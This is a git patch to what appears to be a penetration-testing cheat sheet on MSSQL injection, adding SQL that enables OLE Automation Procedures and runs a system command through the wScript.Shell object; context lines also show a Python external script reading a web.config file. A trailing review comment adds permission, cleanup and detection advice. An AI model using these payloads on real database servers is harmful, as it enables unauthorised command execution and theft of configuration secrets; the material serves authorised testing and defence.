From 3c96a15f58dd0c52ba2380c43d7ffa6b67923654 Mon Sep 17 00:00:00 2001
From: f0rk3b0mb
Date: Tue, 28 Apr 2026 12:07:54 +0300
Subject: [PATCH] added ole automation command execution
---
 SQL Injection/MSSQL Injection.md | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 28bc4f3e..d2ca3b55 100644
--- a/SQL Injection/MSSQL Injection.md
+++ b/SQL Injection/MSSQL Injection.md
@@ -22,6 +22,7 @@
 * [MSSQL Command Execution](#mssql-command-execution)
 * [XP_CMDSHELL](#xp_cmdshell)
 * [Python Script](#python-script)
+ * [OLE Automation](#ole-automation)
 * [MSSQL Out of Band](#mssql-out-of-band)
 * [MSSQL DNS Exfiltration](#mssql-dns-exfiltration)
 * [MSSQL UNC Path](#mssql-unc-path)
@@ -295,6 +296,33 @@ EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__im
 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
 ```
+### OLE Automation
+
+`Object Linking and Embedding (OLE)` is a technology that allows one application to link objects into another application. It was originally designed for Microsoft Office (e.g. to embed Excel sheets into Word documents) and eventually became the foundation for the Component Object Model (COM). OLE Automation enables a SQL server to interact with arbitrary COM objects.
+
+```sql
+-- Check current status
+
+EXEC sp_configure 'Ole Automation Procedures';
+
+-- Enable OLE Automation
+
+EXEC sp_configure 'Ole Automation Procedures', 1;
+RECONFIGURE;
+
+-- Verify it's enabled
+
+EXEC sp_configure 'Ole Automation Procedures';
+
+-- run command
+
+DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("whoami")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output;
+
+
+-- NOTE that it does not print output (it is blind execution)
+
+```
+
 ## MSSQL Out of Band
 ### MSSQL DNS exfiltration
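Review bot: The new OLE Automation block turns on a server-wide option that SQL Server ships disabled, and it neither says so nor turns it back off, so an instance used for an authorised test is left with a larger attack surface than it started with. I would add a sentence under the heading stating that changing the option needs the `ALTER SETTINGS` permission (held by `sysadmin` and `serveradmin`) and that `sp_OACreate` is limited to `sysadmin` or an explicit EXECUTE grant, and close the block with `-- Restore the default` followed by `EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;`. The variable `@output` holds the object token returned by `sp_oacreate`, not command output, so a name such as `@shell` would agree with the closing note about blind execution. One line for defenders is also worth adding: the configuration change is written to the SQL Server error log, so an unexpected flip of this option is a usable alert.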